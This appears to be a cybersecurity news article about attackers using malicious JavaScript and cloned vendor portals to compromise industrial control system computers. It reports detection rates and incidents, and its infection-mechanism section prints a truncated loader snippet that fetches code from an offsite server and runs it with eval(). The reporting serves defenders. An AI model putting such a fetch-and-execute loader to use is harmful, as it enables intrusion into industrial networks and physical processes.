Industrial automation systems have become the latest battleground for sophisticated cybercriminals who are deploying cleverly crafted malicious scripts and phishing pages to compromise ICS computers.
Over the first half of 2025, attackers have increasingly shifted to web-based attack vectors, exploiting legacy interfaces, weak authentication, and outdated software in operational technology environments.
These threat actors deliver malicious JavaScript payloads via compromised websites and phishing emails that mimic legitimate vendor pages or internal dashboards.
Once a user interacts with the page, the script executes automatically, allowing the adversary to deliver next-stage payloads designed to extract credentials, establish backdoors, and move laterally within the network.
Detection data from Securelist indicates that the percentage of ICS computers on which malicious scripts and phishing pages were blocked reached 6.49% in Q2 2025, down slightly from the previous quarter.
Despite the modest decrease, this category remains the most prevalent web-based threat to industrial networks, surpassing traditional malware families such as trojans and keyloggers.
Regional analysis shows that Africa and South-East Asia saw the highest infection attempts, while Northern Europe remained the least targeted.
The decline in blocked scripts may reflect both improved defenses and the attackers’ pivot toward more targeted, low-volume campaigns.
Securelist analysts identified that many of these attacks leverage common industrial protocols—such as Modbus and OPC UA—to embed command sequences within ostensibly benign script hosts.
By masquerading control commands as part of a legitimate maintenance interface, threat actors can manipulate programmable logic controllers (PLCs) and supervisory control and data acquisition (SCADA) systems without triggering conventional antivirus signatures.
Percentage of ICS computers on which the activity of malicious objects from various categories was blocked (Source – Securelist)
The attackers often chain multiple JavaScript modules: the initial loader script pulls a second-stage downloader, which in turn retrieves a lightweight reverse shell written in Node[.]js.
While most incidents involve credential harvesting and reconnaissance, several high-impact campaigns enabled direct manipulation of industrial processes.
In one case, adversaries altered setpoints on a chemical processing line, causing temperature fluctuations that triggered emergency shutdowns.
In another, attackers used phishing pages that mimicked a well-known remote support portal to steal privileged accounts, later deploying malicious scripts that disabled safety interlocks.
These operations underline the urgent need for deep-inspection proxies and multi-factor authentication on all ICS-facing web interfaces.
Infection Mechanism and Script Delivery
The initial infection typically begins with a phishing email containing a link to a cloned vendor portal. Upon visiting the page, a JavaScript snippet automatically downloads and executes from an offsite server:
[script]
// Loader fetches and executes the second-stage payload
fetch(‘
.then(response => response.text())
.then(code => eval(code));
[/script]
The loader script then writes a Node[.]js-based shell to disk and registers it as a system service, ensuring persistence across reboots.
It also injects WebSocket hooks into the browser process to tunnel PLC commands through the existing network channel.
Evading detection is further achieved by obfuscating function names and encoding payloads in Base64, only decoding them at runtime.
Continuous monitoring of web gateway logs and implementing strict content security policies can disrupt this chain of execution and prevent unauthorized script retrieval.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
The post Threat Actors Attacking ICS Computers With Malicious Scripts and Phishing Pages appeared first on Cyber Security News.
